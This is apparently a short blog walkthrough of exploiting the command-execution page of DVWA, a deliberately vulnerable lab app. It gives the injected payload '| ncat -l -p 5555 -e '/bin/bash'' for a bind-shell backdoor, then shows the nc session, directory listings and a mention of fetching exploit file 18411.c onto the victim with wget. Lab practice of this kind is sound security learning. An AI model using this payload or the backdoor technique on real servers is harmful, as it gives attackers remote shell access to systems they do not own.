And this condition, i will hacking website with command execution. We use nc to create backdoor to DVWA.
we use | ncat -l-p 5555 -e '/bin/bash' to create backdoor
we try nc and use ls to listening file
root@bt:~# nc 127.0.0.1 5555
ls
help
index.php
php-backdoor.php
php-backdoor.php.1
php-backdoor.php.2
source
we use pwd to see position, i change directory to /tmp after that i use ls to listening file.
pwd
/var/www/dvwa/vulnerabilities/exec
cd /tmp
ls
VMwareDnD
gpg-oRkFC9
kde-root
ksocket-root
orbit-root
pulse-sRwpC5iUzahE
serverauth.931hzqFniM
ssh-guIVrZ1662
vmware-root
i use wget to download file 18411.c to victim. After that i see again with ls and file 18411.c not found in file ls.
ls
VMwareDnD
gpg-oRkFC9
kde-root
ksocket-root
orbit-root
pulse-sRwpC5iUzahE
serverauth.931hzqFniM
ssh-guIVrZ1662
vmware-root
ls -lia
total 60
2752513 drwxrwxrwt 13 root root 4096 Mar 6 03:52 .
2 drwxr-xr-x 28 root root 4096 Mar 6 02:09 ..
2756082 drwxrwxrwt 2 root root 4096 Mar 6 02:29 .ICE-unix
2756089 -r--r--r-- 1 root root 11 Mar 6 02:08 .X0-lock
2756081 drwxrwxrwt 2 root root 4096 Mar 6 02:08 .X11-unix
2756104 drwx------ 2 root root 4096 Mar 6 02:28 .org.chromium.muUsCf
2756083 drwxrwxrwt 2 root root 4096 Mar 6 02:07 VMwareDnD
2756094 drwx------ 2 root root 4096 Mar 6 02:08 gpg-oRkFC9
2756096 drwx------ 2 root root 4096 Mar 6 03:20 kde-root
2756097 drwx------ 2 root root 4096 Mar 6 04:49 ksocket-root
2756172 drwx------ 2 root root 4096 Mar 6 04:37 orbit-root
2756111 drwx------ 2 root root 4096 Mar 6 02:08 pulse-sRwpC5iUzahE
2756092 -rw------- 1 root root 141 Mar 6 02:08 serverauth.931hzqFniM
2756091 drwx------ 2 root root 4096 Mar 6 02:08 ssh-guIVrZ1662
2756084 drwx------ 2 root root 4096 Mar 6 02:07 vmware-root
Tidak ada komentar:
Posting Komentar